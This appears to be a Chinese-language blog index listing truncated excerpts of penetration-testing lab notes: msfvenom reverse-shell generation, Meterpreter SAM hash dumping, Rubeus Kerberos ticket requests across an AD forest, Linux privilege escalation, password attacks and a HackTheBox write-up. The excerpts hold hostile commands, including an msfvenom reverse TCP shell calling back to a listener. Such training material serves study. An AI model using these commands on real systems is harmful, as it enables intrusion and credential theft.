1. 获取一个Meterpreter shellmsfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.192.128 LPORT=3333 -f exe -o reverse.exe 2. 在Kali使用handler模块建立监听use exploit/multi/hand...

查看有哪些服务在运行ps aux查看进程ps aux | grep mysqlps aux | moreps -elftop动态查看进程cat /etc/services 查看服务文件 cat /etc/services | grep ssh 哪些服务以root用户运行，这些服...

账户文件sam的位置%SystemRoot%\system32\config\SAM对应的注册表HKLM\SAM 1. 获取密码hash我们先获取SYSTEM权限的meterpreter 方法一:hashdump 方法二:pwdumphttps://github.com/Seabreg/pw...

环境Active Directory Enumeration – Enumeration Using Legacy Windows Tools – VM Group 1IP:192.168.169.70-76 首先连接192.168.169.75  Windows11环境xfreerdp /u:stephanie /d:corp.co...

任务• 利用 dollarcorp.moneycorp.local 上的 DA 权限，获取对 eurocorp.local 林的 DC 上的 SharedwithDCorp 共享的访问权限。 C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:63662...

https://vk9-sec.com/disk-group-privilege-escalation/?source=post_page-----b14a6e535e1f-------------------------------- 1. 首先查看属于我们组的硬盘ls -l /dev 2. 查看/root属于那个...

1. 概述配置Trunk时，应先使用port link-type trunk命令修改端口的类型为Trunk，然后再配置Trunk端口允许哪些VLAN的数据帧通过。执行port trunk allow-pass vlan { { vlan-id1 [ to vlan-i...

1. 密码攻击在探索这些攻击之前，我们需要考虑一个重要的因素。在执行暴力或单词列表身份验证攻击时，我们必须注意帐户锁定。登录失败次数过多可能会阻止帐户遭受进一步的攻击，并可能向系统管...

http://www.zhyann.net/index.php/2024/06/03/granny-webdav%e6%96%87%e4%bb%b6%e4%b8%8a%e4%bc%a0%e6%bc%8f%e6%b4%9e-churrasco%e6%9d%83%e9%99%90%e6%8f%90%e5%8d%87/ 信息收集和权限提升和...

1. 计划任务有哪些任务计划？任务计划对于系统来说是非常重要的它可以让系统的一些工作（如备份）自动、周期运行，来提升工作效率周期性任务计划服务进程crond·次性任务计划服务进程atd攻击者...